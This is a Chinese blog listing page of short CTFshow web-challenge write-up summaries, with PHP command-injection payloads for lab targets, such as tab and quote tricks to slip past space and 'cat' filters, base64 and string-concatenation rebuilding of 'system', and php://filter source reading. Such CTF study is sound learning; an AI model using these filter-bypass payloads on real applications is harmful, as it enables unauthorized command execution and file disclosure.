会员
众包
新闻
博问
闪存
赞助商
HarmonyOS
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
z1ten9
博客园
首页
新随笔
联系
订阅
管理
上一页
1
2
3
4
2021年2月1日
CTFshow WEB入门31
摘要: 在WEB30的基础上额外过滤了cat与空格 想个办法绕过 借用Pur3师傅的绕过姿势 以TAB代替空格,用more代替cat payload:?c=passthru("more%09fl*");
阅读全文
posted @ 2021-02-01 11:15 z1ten9
阅读(273)
评论(0)
推荐(0)
2021年1月31日
CTFshow WEB入门30
摘要: 在web29的基础上过滤了system 找个替代system的外部命令执行函数 三种命令执行函数的区别 PHP 执行系统外部命令 system() exec() passthru() 区别: system() 输出并返回最后一行shell结果。 exec('') 无回显(感谢Dem0师傅的讲解),且
阅读全文
posted @ 2021-01-31 21:48 z1ten9
阅读(169)
评论(0)
推荐(0)
CTFshow WEB入门29
摘要: 通过?c=system('ls');发现存在flag.php 题目过滤了flag,想办法绕过flag 方法一: ?c=system('cat fl*'); 查看源码得到flag 方法二: 利用php://filter协议来查看源文件内容; ?c=echo 'f';?><?php include($_
阅读全文
posted @ 2021-01-31 21:27 z1ten9
阅读(186)
评论(0)
推荐(0)
2021年1月14日
CTFshow WEB入门1-20(信息搜集)经验总结
摘要: Web1 查看源码 Web2 使用view-source:查看源码 Web3 藏在请求头中 Web4 查看robots.txt得到flag的地址 Web5 php源码泄露,访问index.php得到flag Web6 源码泄露,访问url/www.zip,同时附带下源码文件夹 Web7 git源码泄
阅读全文
posted @ 2021-01-14 12:17 z1ten9
阅读(614)
评论(0)
推荐(0)
2021年1月10日
CTFshow 萌新计划web9-15
摘要: 各种绕过姿势,总结一下 1.构造 ?c=$a='sys';$b='tem';$d=$a.$b;$d('cat config.php'); 2.cat绕过 ?c=system('ca""t config.php') 3.base64绕过 ?c=$a = base64_decode('c3lzdGVt'
阅读全文
posted @ 2021-01-10 21:01 z1ten9
阅读(471)
评论(0)
推荐(0)
2021年1月9日
CTFshow 萌新计划web1-8
摘要: web1-7目的很简单:构造出id=1000的同时绕过函数 这里引用yu22x大佬的绕过姿势 https://blog.csdn.net/miuzzx/article/details/105280285 web8是个梗题,结合上文阿呆被炒鱿鱼和一顿熟悉的操作(删库跑路),再结合题目得到答案 flag
阅读全文
posted @ 2021-01-09 21:30 z1ten9
阅读(590)
评论(0)
推荐(0)
上一页
1
2
3
4
公告